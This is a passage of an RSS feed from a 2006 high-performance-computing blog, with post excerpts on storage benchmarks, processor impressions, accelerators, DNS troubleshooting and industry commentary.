sys 3m38.978s
[root@jackrabbit 2]# ls -alF big_file
-rw-rw---- 1 root landman 131072000000 Nov 8 22:11 big_file
[root@jackrabbit 2]# du -h big_file
123G big_file

Call it 4 minutes: 240 seconds to create a 123 GB file. This is a little north of 500 MB/s write.</description>
    </item>
    
    <item>
      <title>Maximizing the minimum performance</title>
      <link>https://blog.scalability.org/2006/11/maximizing-the-minimum-performance/</link>
      <pubDate>Fri, 10 Nov 2006 01:27:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/maximizing-the-minimum-performance/</guid>
      <description>Our little L. Flavigularis is shaping up nicely. IOzone tests are, well, quite respectable (bug me at SC06 about this if you are interested). I expect to see some serious FUD from competitors, especially if they get a look at the numbers. And that concerns me, as I am not at all convinced that IOzone and its ilk represent real measurements of meaningful items. I have a strong sense of a &amp;ldquo;herd&amp;rdquo; mentality/effect.</description>
    </item>
    
    <item>
      <title>L. Flavigularis  update</title>
      <link>https://blog.scalability.org/2006/11/l-flavigularis-update/</link>
      <pubDate>Wed, 08 Nov 2006 03:58:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/l-flavigularis-update/</guid>
      <description>We took L. Flavigularis out to a test track, in a manner of speaking. IOzone, to be specific. We cracked the throttle a bit. Not flat out. Just a speed trial.
Wow &amp;hellip;. This little critter is fast. The previous numbers &amp;hellip; are at the low end of the range.</description>
    </item>
    
    <item>
      <title>The joy of (broken) DNS</title>
      <link>https://blog.scalability.org/2006/11/the-joy-of-broken-dns/</link>
      <pubDate>Tue, 07 Nov 2006 00:58:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/the-joy-of-broken-dns/</guid>
      <description>landman@balto ~ $ ping jackrabbit
landman@balto ~ $ nslookup !$
nslookup jackrabbit
Server: crunch-r.scalableinformatics.com
Address: x.y.z.t
Name: jackrabbit
Address: 192.168.1.155
landman@balto ~ $ ping jackrabbit
ping: unknown host jackrabbit

Oh &amp;hellip; it gets better. Run strace on ping jackrabbit. I want to know where the failure is. I&amp;rsquo;ll tell you why in a minute.

487 246858 [main] ping 3308 sig_send: returning 0x0 from sending signal -34
21823 268681 [main] ping 3308 wsock_init: res 0
607 269288 [main] ping 3308 wsock_init: wVersion 514
313 269601 [main] ping 3308 wsock_init: wHighVersion 514
6813 276414 [main] ping 3308 wsock_init: szDescription WinSock 2.</description>
    </item>
    
    <item>
      <title>Initial impressions of Socket F/1207 machine</title>
      <link>https://blog.scalability.org/2006/11/initial-impressions-of-socket-f1207-machine/</link>
      <pubDate>Sun, 05 Nov 2006 15:16:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/initial-impressions-of-socket-f1207-machine/</guid>
      <description>We have a machine we are building in the lab now. I am running all sorts of code on it. My impressions?
It is a somewhat better Opteron than Opteron. The tests I have run to date indicate that the 2.6 GHz unit is on par with, if not slightly faster than the Woodcrest 2.66 GHz unit. This is mostly heavy computational code: GAMESS runs, a weather code for a customer, and others.</description>
    </item>
    
    <item>
      <title>This is a good thing, if it is real</title>
      <link>https://blog.scalability.org/2006/11/this-is-a-good-thing-if-it-is-real/</link>
      <pubDate>Thu, 02 Nov 2006 22:00:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/this-is-a-good-thing-if-it-is-real/</guid>
      <description>Saw this on /. then followed it to the WSJ. If this is real, then this is a good thing. SuSE is IMO one of the better distributions of Linux, certainly quite professional, and they use a modern kernel.
This latter issue is quite important. The 2.6.9 kernel in some dominant North American distributions is dangerously out of date IMO, as it does not support modern hardware without serious effort. SATA was not properly supported until their U2 release of the v4 product.</description>
    </item>
    
    <item>
      <title>Windsprints with L. flavigularis</title>
      <link>https://blog.scalability.org/2006/11/windsprints-with-l-flavigularis/</link>
      <pubDate>Thu, 02 Nov 2006 16:39:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/windsprints-with-l-flavigularis/</guid>
      <description>Taking our little L. flavigularis for a few tests. Its motherboard needs the 2.6.17 and above kernels. Used Ubuntu Edgy Eft (6.10) for it. Even had the latest version of the drivers we needed built in. Install was easy. The specs on the unit are incredible (initial performance data below). Built the disk arrays (ok, started the build, it takes a while). 26TB RAID6 usable before formatting. Cool. 25TB after formatting.</description>
    </item>
    
    <item>
      <title>Woodcrest update, day N&#43;1</title>
      <link>https://blog.scalability.org/2006/11/woodcrest-update-day-n1/</link>
      <pubDate>Wed, 01 Nov 2006 14:14:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/woodcrest-update-day-n1/</guid>
      <description>So we have had a Woodcrest in house for a while now. When we have had time we have beaten on it and run codes on it. My impressions are now well formed, and I understand where it makes sense as a platform, and where the competitive technologies make sense. This is not from marketing documents, but from real world testing.
Woodcrest is basically an AMD64 platform without the IOMMU. The processor architecture includes a much improved SSE engine, a larger shared cache, and theoretically, larger memory bandwidth than its competitor.</description>
    </item>
    
    <item>
      <title>OT: Just say no (to RBL)</title>
      <link>https://blog.scalability.org/2006/10/ot-just-say-no-to-rbl/</link>
      <pubDate>Tue, 31 Oct 2006 23:30:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/ot-just-say-no-to-rbl/</guid>
      <description>While spam is on the rise, some people resort to battlefield thermonuclear weapons to solve the issue, not caring about the grave damage they do to legitimate users.
Specifically RBLs. RBLs are an old technology. The idea is that you don&amp;rsquo;t filter content, you block the source. This way you don&amp;rsquo;t ever have to deal with content you aren&amp;rsquo;t interested in. They block subnets. Things were good. Until someone noticed that legitimate users who had IPs in those subnets were being banned.</description>
    </item>
    
    <item>
      <title>Must have hit a nerve with that one ...</title>
      <link>https://blog.scalability.org/2006/10/must-have-hit-a-nerve-with-that-one/</link>
      <pubDate>Tue, 31 Oct 2006 19:46:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/must-have-hit-a-nerve-with-that-one/</guid>
      <description>A number of folks have spoken to me offline now about this post. Seems like a number of &amp;ldquo;vendors&amp;rdquo; drop boxes off that sometimes work, and sometimes do not. Anyone have experience with this they would like to share?</description>
    </item>
    
    <item>
      <title>Not a bandwidth record, but ...</title>
      <link>https://blog.scalability.org/2006/10/not-a-bandwidth-record-but/</link>
      <pubDate>Tue, 31 Oct 2006 19:03:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/not-a-bandwidth-record-but/</guid>
      <description>Ok&amp;hellip; I moved 34.5 TB between two sites in about 30 minutes. This is a hair under 70 TB/hour. About 19.4 GB/s. Not bad, eh?
The technology that brought you this? A 10-year-old Jeep. I carried 46 x 750 GB drives in my truck as I moved them from site A to site B, about 30 miles (~50km) apart.</description>
    </item>
    
    <item>
      <title>The (lack of) quality of motherboards</title>
      <link>https://blog.scalability.org/2006/10/the-lack-of-quality-of-motherboards/</link>
      <pubDate>Tue, 31 Oct 2006 01:17:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/the-lack-of-quality-of-motherboards/</guid>
      <description>We do everything we can to stop failing subsystems from ever entering our customers&amp;rsquo; hands. We beat on our systems, usually with loads far in excess of what our customers will do. No, not using memtest. We run real codes. And we catch lots of problems.
What surprises me, really gets to me, is that some motherboard makers (who shall remain nameless) ship product to their customers (us) for integration into our products, or as subsystems into products we buy from others, and this product does not work.</description>
    </item>
    
    <item>
      <title>Built for raw firepower</title>
      <link>https://blog.scalability.org/2006/10/built-for-raw-firepower/</link>
      <pubDate>Thu, 26 Oct 2006 06:23:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/built-for-raw-firepower/</guid>
      <description>Working on a cool project, hopefully I will get to say something soon about it. If you are at SC06, and you see me, ask me about it.
I installed its brain (a pair of Opteron 2218&amp;rsquo;s) and lungs today. Have a few other bits to install; our L. flavigularis is taking shape. Taking pictures as I go. Will post after we are complete. After it is finished, will apply the power.</description>
    </item>
    
    <item>
      <title>The &#34;good enough&#34; factor, or how to make yourself irrelevant in the market</title>
      <link>https://blog.scalability.org/2006/10/the-good-enough-factor-or-how-to-make-yourself-irrelevant-in-the-market/</link>
      <pubDate>Tue, 24 Oct 2006 05:09:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/the-good-enough-factor-or-how-to-make-yourself-irrelevant-in-the-market/</guid>
      <description>This post has been through countless iterations. I have written and rewritten it a multitude of times, because I was looking for a way to say it, but never quite settled on a particular manner. So here it is &amp;hellip; stream of consciousness and all that.
We had lost a few bids recently, and while I don&amp;rsquo;t want to comment on to whom or for whom, I want to comment on &amp;ldquo;why&amp;rdquo;. The reason I want to comment on the &amp;ldquo;why&amp;rdquo; is that it has importance to the market, and those who forget this &amp;ldquo;why&amp;rdquo; are doomed to make the same mistakes.</description>
    </item>
    
    <item>
      <title>(semi-live) blogging SC06</title>
      <link>https://blog.scalability.org/2006/10/semi-live-blogging-sc06/</link>
      <pubDate>Tue, 24 Oct 2006 01:34:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/semi-live-blogging-sc06/</guid>
      <description>Well I am all registered. I plan on using a better camera this year, and reading the manual in advance. No more sideways movies (sheesh!). Photos / movies will be at photos.scalability.org .
I may show a bias towards accelerated computing and accelerated processing, so please forgive this in advance. If there are particular items that you think are interesting, please let me know. It is a big show, and it is hard to see all/most of it.</description>
    </item>
    
    <item>
      <title>Of small decisions, large migrations come to pass</title>
      <link>https://blog.scalability.org/2006/10/of-small-decisions-large-migrations-come-to-pass/</link>
      <pubDate>Tue, 24 Oct 2006 01:23:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/of-small-decisions-large-migrations-come-to-pass/</guid>
      <description>I had heard of some changes in the windows licensing model. Windows licensing is relevant if you are building a windows cluster, as you now have a new set of costs and usage restrictions atop your machine, that you simply don&amp;rsquo;t have with the alternatives.
Let&amp;rsquo;s focus on the question that cluster builders have to face. So you have this nice shiny new cluster with 30 or so new machines. You know you are going to cycle machines in and out of the cluster.</description>
    </item>
    
    <item>
      <title>This is wrong... so very, very wrong ...</title>
      <link>https://blog.scalability.org/2006/10/this-is-wrong-so-very-very-wrong/</link>
      <pubDate>Sat, 21 Oct 2006 15:27:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/this-is-wrong-so-very-very-wrong/</guid>
      <description>I was searching for some data on drift/group velocity of charge carriers in semiconductors for something I am working on. Yeah, I know, nice stuff to google for. I ran across this. I nearly fell out of my chair.</description>
    </item>
    
    <item>
      <title>The right tools for the job</title>
      <link>https://blog.scalability.org/2006/10/the-right-tools-for-the-job/</link>
      <pubDate>Sun, 15 Oct 2006 03:53:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/the-right-tools-for-the-job/</guid>
      <description>Reading through some of the most interesting papers at the upcoming SC06 show. Yes, we will be there wandering around. I read an interesting paper from the originators of mpiBLAST. They had a great quote about developing very high performance computing tools, specifically in terms of tying multiple other tools together. They used Perl to do this. For good reason. Here is the quote:
I am not trying to denigrate C/C++.</description>
    </item>
    
    <item>
      <title>The long term impact of poor decisions and implementations</title>
      <link>https://blog.scalability.org/2006/10/the-long-term-impact-of-poor-decisions-and-implementations/</link>
      <pubDate>Fri, 13 Oct 2006 19:09:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/the-long-term-impact-of-poor-decisions-and-implementations/</guid>
      <description>We often get interesting requirements for clusters. Sometimes we speak to people who believe that clock frequency defines the speed of the unit, so therefore, a 3.6 GHz processor must be faster than a 2.66 GHz processor. This is not the case (clock frequency == performance), but it has been hammered home by one OEM (cough cough) for a long time, so their customers are attuned to it. Makes it hard to explain to a customer how a 2.</description>
    </item>
    
    <item>
      <title>Drinking the koolaid, by the megaliter</title>
      <link>https://blog.scalability.org/2006/10/drinking-the-koolaid-by-the-megaliter/</link>
      <pubDate>Mon, 09 Oct 2006 21:00:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/drinking-the-koolaid-by-the-megaliter/</guid>
      <description>We have been talking about application acceleration and heterogeneous computing for quite a while now. Call it HPC and you scare off anyone who might otherwise be interested in helping to build the future of computing. It really doesn&amp;rsquo;t matter what you call it at the end of the day. It is coming. Fast. Fine. Let&amp;rsquo;s call it Accelerated Computing (AC for short). I have a reason for this.
Accelerated computing is not just for high performance computing.</description>
    </item>
    
    <item>
      <title>confluence</title>
      <link>https://blog.scalability.org/2006/10/confluence/</link>
      <pubDate>Mon, 09 Oct 2006 20:34:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/confluence/</guid>
      <description>Deepak over at the always enjoyable mndoci.com blog asked a great question. It&amp;rsquo;s the question about the utility of any technology, and specifically he asked whether or not APUs and accelerators in general would be useful.
Around the same time, a BAA was released by the US Government requesting that people start giving accelerated computing a serious look for their applications; though they didn&amp;rsquo;t indicate the applications explicitly, one could guess at them.</description>
    </item>
    
    <item>
      <title>When one paragraph says it all</title>
      <link>https://blog.scalability.org/2006/10/when-one-paragraph-says-it-all/</link>
      <pubDate>Mon, 09 Oct 2006 20:23:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/when-one-paragraph-says-it-all/</guid>
      <description>Today at HPCwire. They have a quote on the Tokyo Tech machine.
(my emphasis) I remember the VC&amp;rsquo;s asking me, &amp;ldquo;but how do you know this will even matter in HPC?&amp;rdquo; during our pitch. Now I can say, &amp;ldquo;Hindsight&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>apologies for the recent infrequent posting</title>
      <link>https://blog.scalability.org/2006/10/apologies-for-the-recent-infrequent-posting/</link>
      <pubDate>Fri, 06 Oct 2006 02:39:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/apologies-for-the-recent-infrequent-posting/</guid>
      <description>My time is a zero sum game. My day job kicked into serious overdrive in the last few weeks, and I simply haven&amp;rsquo;t had cycles to surface. Will try to force this over the weekend. Lots to write about. Like the accelerator market going into warp drive (pun intended), a really interesting BAA from the USG. And of course people who want and need things &amp;hellip; all of these do a really good job of driving &amp;ldquo;free&amp;rdquo; time down to 0.</description>
    </item>
    
    <item>
      <title>Slightly OT</title>
      <link>https://blog.scalability.org/2006/09/slightly-ot/</link>
      <pubDate>Fri, 29 Sep 2006 06:50:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/09/slightly-ot/</guid>
      <description>Given the discussions on this and other web sites by biased partisans (myself included), I thought this headline (SMB Linux use on the rise) and article was interesting.
The major thesis is interesting, but the data contained within is startling. First, they note that Linux isn&amp;rsquo;t the selling point. Something we have pointed out here before: the OS is not the issue. It&amp;rsquo;s the applications. It is always the applications. People claiming that the issue is the installation of the OS are missing the boat.</description>
    </item>
    
    <item>
      <title>Generating an &#34;optimal&#34; circuit from a language construct</title>
      <link>https://blog.scalability.org/2006/09/generating-an-optimal-circuit-from-a-language-construct/</link>
      <pubDate>Sat, 23 Sep 2006 05:40:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/09/generating-an-optimal-circuit-from-a-language-construct/</guid>
      <description>We use high level languages to provide an abstraction against the hardware, OS, system services we want to use. The compiler is responsible for this mapping. So when I write a simple loop
for(i=0;i&amp;lt;N;i++) { a[i] = b[i] + c[i]; }  or for you Fortran types out there
do i=0,N-1 a(i)=b(i)+c(i) enddo  The compiler will turn that into an assembly language loop, which loads an iteration counter (i) into a register, either load registers with a[i], b[i], and c[i], or do memory operations to load compute and then save.</description>
    </item>
    
    <item>
      <title>For a market that some claim does not exist, this is attracting lots of attention and product ...</title>
      <link>https://blog.scalability.org/2006/09/for-a-market-that-some-claim-does-not-exist-this-is-attracting-lots-of-attention-and-product/</link>
      <pubDate>Wed, 20 Sep 2006 19:33:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/09/for-a-market-that-some-claim-does-not-exist-this-is-attracting-lots-of-attention-and-product/</guid>
      <description>Interesting. Just like we predicted several years ago.
The winners in any APU contest will be the ones that can leverage economies of scale. At a few hundred dollars per unit, the Cell is likely to dominate due to the PS3 volume anticipated. The ATI systems, and the nVidia systems if Quadro Plex comes out in time, will also be quite relevant. Several thousand dollars per APU (a la current Virtex 4/Altera pricing) is a non-starter.</description>
    </item>
    
    <item>
      <title>To abstract or not to abstract: that is the question ...</title>
      <link>https://blog.scalability.org/2006/09/to-abstract-or-not-to-abstract-that-is-the-question/</link>
      <pubDate>Wed, 20 Sep 2006 15:44:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/09/to-abstract-or-not-to-abstract-that-is-the-question/</guid>
      <description>&amp;hellip; Whether &amp;lsquo;tis nobler in the developer&amp;rsquo;s mind to suffer The slings and arrows of outrageous application performance, Or to take arms against a sea of development troubles And by abstraction end them? &amp;ndash; &amp;ldquo;Bill S&amp;rdquo; on whether or not to use higher level abstractions when programming for performance.
Ok, &amp;ldquo;Bill&amp;rdquo; didn&amp;rsquo;t really write that, his text was paraphrased and adapted. I am also pretty sure he wasn&amp;rsquo;t writing parallel code (parallel prose maybe).</description>
    </item>
    
    <item>
      <title>The market for accelerators and APUs</title>
      <link>https://blog.scalability.org/2006/09/the-market-for-accelerators-and-apus/</link>
      <pubDate>Wed, 20 Sep 2006 03:32:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/09/the-market-for-accelerators-and-apus/</guid>
      <description>The PeakStream news, raising $17M in a B round was wonderful to hear about. I am happy for them, and wish them success. Recently I read that Linux Networx raised money as well. LNXI is also an interesting company. Maybe this is the harbinger of good things to come.
I don&amp;rsquo;t know. In either case, PeakStream&amp;rsquo;s product has some limitations as an accelerator, due to the single precision focus. Linux Networx also announced its own accelerators recently, though I don&amp;rsquo;t know how much has been released publicly at this point about them, or if customers have them and have reactions yet.</description>
    </item>
    
    <item>
      <title>APU programming made easy?</title>
      <link>https://blog.scalability.org/2006/09/apu-programming-made-easy/</link>
      <pubDate>Tue, 19 Sep 2006 06:19:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/09/apu-programming-made-easy/</guid>
      <description>The folks over at Peakstream have some interesting ideas. Very similar to what we have been talking about and pitching for the past 4 years.
One difference is that they have just closed a series B round, and we can&amp;rsquo;t seem to find any interest. It&amp;rsquo;s the location. Ok, on to the concept. Abstract the complexity. Make the programming simpler. Make it easy to integrate. Make it seamless. Remove restrictions. Sounds good, right?</description>
    </item>
    
    <item>
      <title>Breaking mirror symmetry in HPC</title>
      <link>https://blog.scalability.org/2006/09/breaking-mirror-symmetry-in-hpc/</link>
      <pubDate>Fri, 15 Sep 2006 05:34:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/09/breaking-mirror-symmetry-in-hpc/</guid>
      <description>If you are not already reading HPCWire on a regular basis, I do recommend it as one of the &amp;ldquo;must&amp;rdquo; weekly aggregation sites. They have an interesting article on the &amp;ldquo;coming&amp;rdquo; heterogeneous computing systems. Neat idea, but heterogeneous supercomputing systems are already here. Have been for a while. In massive numbers. Working on specialized HPC problems. More about this in a moment.
HPC has a concept built into it. Symmetric multiprocessing, or SMP systems.</description>
    </item>
    
    <item>
      <title>Is there a need for supercomputing?</title>
      <link>https://blog.scalability.org/2006/09/is-there-a-need-for-supercomputing/</link>
      <pubDate>Fri, 08 Sep 2006 04:33:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/09/is-there-a-need-for-supercomputing/</guid>
      <description>Why not ask the Council on Competitiveness.
Or the businesses that have grown dependent upon simulation? Well, not all of them are doing well. Ford&amp;rsquo;s troubles are fairly well known, but this is not a supercomputing issue, it is a business conditions issue. Dreamworks and Boeing aren&amp;rsquo;t in trouble, they are doing well. As are many of the others who attended this meeting. All of them appear to indicate that they need more computing power and more software that can take advantage of this power.</description>
    </item>
    
    <item>
      <title>APUs in the news</title>
      <link>https://blog.scalability.org/2006/09/apus-in-the-news/</link>
      <pubDate>Thu, 07 Sep 2006 00:43:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/09/apus-in-the-news/</guid>
      <description>Referencing this article. When we talked to a few VC&amp;rsquo;s previously about APUs, we were asked to show that there would be demand. Kind of hard to do so in advance of the market, but we made rough estimates. Earlier this year, ClearSpeed took its reference design board and started selling it. Sure enough people bought it. Because it does a number of things quite well. At a lower power consumption.</description>
    </item>
    
    <item>
      <title>A teraflop here, a teraflop there, and pretty soon you are talking about real computing power</title>
      <link>https://blog.scalability.org/2006/09/a-teraflop-here-a-teraflop-there-and-pretty-soon-you-are-talking-about-real-computing-power/</link>
      <pubDate>Thu, 07 Sep 2006 00:22:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/09/a-teraflop-here-a-teraflop-there-and-pretty-soon-you-are-talking-about-real-computing-power/</guid>
      <description>It seems IBM will be building another new NNSA machine. So what&amp;rsquo;s interesting about this, other than IBM getting good press? Well, this appears to be part of a growing wave of heterogeneous high performance computing systems. Roadrunner appears to be a mix of COTS Opteron hardware, and Cell based blades as Accelerator Processing Units (APUs).
Why is that interesting? Programming parallel systems is hard. Programming heterogeneous parallel systems is &amp;hellip; interesting.</description>
    </item>
    
    <item>
      <title>End of an era or architecture ...</title>
      <link>https://blog.scalability.org/2006/09/end-of-an-era-or-architecture/</link>
      <pubDate>Wed, 06 Sep 2006 20:59:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/09/end-of-an-era-or-architecture/</guid>
      <description>SGI is standing down the Irix and MIPS architectures. Likely one of the harder decisions they have had to make; these cannot have been selling much of late. MIPS was hopelessly long in the tooth, and Irix, while one of the better Unixen out there (IMO), was closely tied to MIPS. In the end Irix could not retain applications, nor continue to attract new ones. When this happens enough, your platform becomes less desirable.</description>
    </item>
    
    <item>
      <title>The best API for parallel programming is ...</title>
      <link>https://blog.scalability.org/2006/08/the-best-api-for-parallel-programming-is/</link>
      <pubDate>Thu, 31 Aug 2006 20:39:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/the-best-api-for-parallel-programming-is/</guid>
      <description>Loaded question. OpenMP may be the simplest to work with. MPI is not. The differences are that OpenMP is integrated as a set of compiler hints and is restricted to shared memory machines. MPI is a set of explicit calls to user-level communication routines that handle data motion for you; you simply point at what to move.
While I wish it were that simple in terms of the differences, there are other major ones.</description>
    </item>
    
    <item>
      <title>Finale: Michigan&#39;s 21st century fund</title>
      <link>https://blog.scalability.org/2006/08/finale-michigans-21st-century-fund/</link>
      <pubDate>Thu, 31 Aug 2006 14:34:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/finale-michigans-21st-century-fund/</guid>
      <description>I have updated a post from a while ago. Call this a rant, a vent, whatever. I am saddened that we wasted so much time on this process. This is not a mistake that will be repeated. I like to tell people that if you design something to fail, often that is exactly what happens. Back to business. Update: 4-Sept-2006 We aren&amp;rsquo;t the only folks to notice that something is not quite right.</description>
    </item>
    
    <item>
      <title>Thou dost protesteth too much, methinks ...</title>
      <link>https://blog.scalability.org/2006/08/thou-dost-protesteth-too-much-methinks/</link>
      <pubDate>Wed, 30 Aug 2006 14:28:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/thou-dost-protesteth-too-much-methinks/</guid>
      <description>I read an amusing article linked to by the fine folks over at slashdot. In the Infoworld article that slashdot points to, the title sets the tone. It is entitled &amp;ldquo;Linux will get buried&amp;rdquo;. I am going to look at this from an HPC viewpoint.
Apple is, and will remain for the foreseeable future, a hardware company. All the software that it does, it does for no other reason than to sell hardware.</description>
    </item>
    
    <item>
      <title>On interoperable and portable environments</title>
      <link>https://blog.scalability.org/2006/08/on-interoperable-and-portable-environments/</link>
      <pubDate>Tue, 29 Aug 2006 00:18:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/on-interoperable-and-portable-environments/</guid>
      <description>or, as Chris over at hpcanswers.org asks, Why did Microsoft release C#? And what has this got to do with HPC? Quite a bit. Call it an opportunity that is currently in the state of being missed by the maker of C#. More about that in a moment.
Chris postulates
Possibly, though I think it is a bit more complex than that. Basically my take on things is that the whole Java fiasco hurt Microsoft &amp;hellip; not technologically, not in a market sense.</description>
    </item>
    
    <item>
      <title>On bottlenecks</title>
      <link>https://blog.scalability.org/2006/08/on-bottlenecks/</link>
      <pubDate>Mon, 28 Aug 2006 05:32:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/on-bottlenecks/</guid>
      <description>At BiO Jeff linked to a story from earlier this year on where the bottlenecks really are in computing. The article he linked to was posted in the American Scientist online magazine.
The major thesis of the article is that performance is not the only, or as the title implies, real bottleneck, in scientific computing. I might suggest reading the article if you get the chance. I don&amp;rsquo;t agree with their major thesis implied in the title.</description>
    </item>
    
    <item>
      <title>Invariant under change of notation</title>
      <link>https://blog.scalability.org/2006/08/invariant-under-change-of-notation/</link>
      <pubDate>Thu, 24 Aug 2006 02:40:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/invariant-under-change-of-notation/</guid>
      <description>This was the &amp;ldquo;joke&amp;rdquo; about tensors that one of my graduate school professors told us when we were trying to grok a sudden notational shift. Took some hard thinking, and then we sorta got it. Well enough to work out a problem. Hopefully to be useful in later life.
Well, 17 years (wow&amp;hellip;. that long?) later, I am writing some quick code to transform a data set extracted in XML into another data set.</description>
    </item>
    
    <item>
      <title>An amalgam of recent conversations</title>
      <link>https://blog.scalability.org/2006/08/an-amalgam-of-recent-conversations/</link>
      <pubDate>Fri, 18 Aug 2006 14:40:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/an-amalgam-of-recent-conversations/</guid>
      <description>This would normally be OT with respect to HPC, if not for Microsoft starting to compete with one of the fastest growing and sustaining markets.
Rather than report all the conversations we have had, I am going to synthesize them into an effective &amp;ldquo;single&amp;rdquo; conversation. This has happened about 5 times this week, online, in person, visiting customers, and so forth. Them: &amp;ldquo;We need low cost and highly secure methods of accessing our cluster resources.</description>
    </item>
    
    <item>
      <title>Is OpenSolaris Open?</title>
      <link>https://blog.scalability.org/2006/08/is-opensolaris-open/</link>
      <pubDate>Thu, 17 Aug 2006 20:03:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/is-opensolaris-open/</guid>
      <description>As seen on /. IBM is questioning whether or not it is really open.
I think the real question is, does it matter? I really don&amp;rsquo;t see a need for it. The market is positively crowded with OpenSource Linux and the *BSDs. OpenSource should not be a repository for declining projects. From an ISV perspective, you have to ask &amp;ldquo;why&amp;rdquo;? Precisely what benefit in terms of lower costs and increased revenue does being on Solaris bring?</description>
    </item>
    
    <item>
      <title>Graphics benchmarking</title>
      <link>https://blog.scalability.org/2006/08/graphics-benchmarking/</link>
      <pubDate>Wed, 16 Aug 2006 17:34:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/graphics-benchmarking/</guid>
      <description>A friend who runs a very cool display company (true 3D volumetric displays, not spinning things), asked me to do a quick benchmark for him. As I was freshly done with some other GLperf stuff, I agreed. FWIW getting GLperf to compile on late model Linux is &amp;hellip; well&amp;hellip; interesting. Especially the 64bit versions. Lots of hardwired bits in the build. Annoying.
His test was fairly simple, but it hit the critical points he needed to hit.</description>
    </item>
    
    <item>
      <title>4 on the floor (or in the socket)</title>
      <link>https://blog.scalability.org/2006/08/4-on-the-floor-or-in-the-socket/</link>
      <pubDate>Wed, 16 Aug 2006 00:59:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/4-on-the-floor-or-in-the-socket/</guid>
      <description>(aka the QUADs are coming, the QUADs are coming)
I was worried about memory bandwidth in the dual core time frame. Turned out to not be a problem for most codes. I will need to see more on the AM3. Punch line is that AM3 is socket compatible with AM2. Wow. Will it have enough bandwidth for 4 cores in a single unit? We are going to need to start talking about bandwidth per socket.</description>
    </item>
    
    <item>
      <title>New programming workshop:  Perl and R for Informatics</title>
      <link>https://blog.scalability.org/2006/08/new-programming-workshop-perl-and-r-for-informatics/</link>
      <pubDate>Tue, 15 Aug 2006 19:22:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/new-programming-workshop-perl-and-r-for-informatics/</guid>
      <description>The good folks over at BioInformatics.org have a new workshop ready to go on programming in Perl and R. See this link for more details. If there is interest in having this outside of Boston, please let me know.</description>
    </item>
    
    <item>
      <title>Woodcrest impressions</title>
      <link>https://blog.scalability.org/2006/08/woodcrest-impressions/</link>
      <pubDate>Tue, 15 Aug 2006 15:11:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/woodcrest-impressions/</guid>
      <description>Ok, it&amp;rsquo;s about 2 weeks into the Woodcrest experiment. I am starting to form opinions about Woodcrest, where it is good, where it is ho-hum. First off, Woodcrest appears to put up really good artificial benchmark numbers. In some cases.
Artificial benchmarks are those which are not programs that people run every day with everyday work loads. Synthetic benchmarks are more of the &amp;ldquo;hundred kernels&amp;rdquo; variety. Both artificial and synthetic benchmarks have their place.</description>
    </item>
    
    <item>
      <title>&#34;Blogmarketing&#34;</title>
      <link>https://blog.scalability.org/2006/08/blogmarketing/</link>
      <pubDate>Tue, 15 Aug 2006 14:56:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/blogmarketing/</guid>
      <description>I have noticed a propensity for corporate &amp;ldquo;bloggers&amp;rdquo; to somehow turn discussions around to the point where they can do a product placement, or somehow hype their own stuff. Think of things like &amp;ldquo;so the Yankees will win the series, and this is why our product X is the best&amp;rdquo;. I kid you not.
Blogging is, or can be, an expression of self. Not arguing for philosophical purity or anything like that.</description>
    </item>
    
    <item>
      <title>Notes about this blog</title>
      <link>https://blog.scalability.org/2006/08/notes-about-this-blog/</link>
      <pubDate>Thu, 03 Aug 2006 17:37:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/notes-about-this-blog/</guid>
      <description>Some readers may misunderstand this blog. Blogs in general are places to get thoughts down, in a public forum, and invite discussion. Sort of an open-source idea site. Download an opinion and fork it if you like, ignore it if you wish.
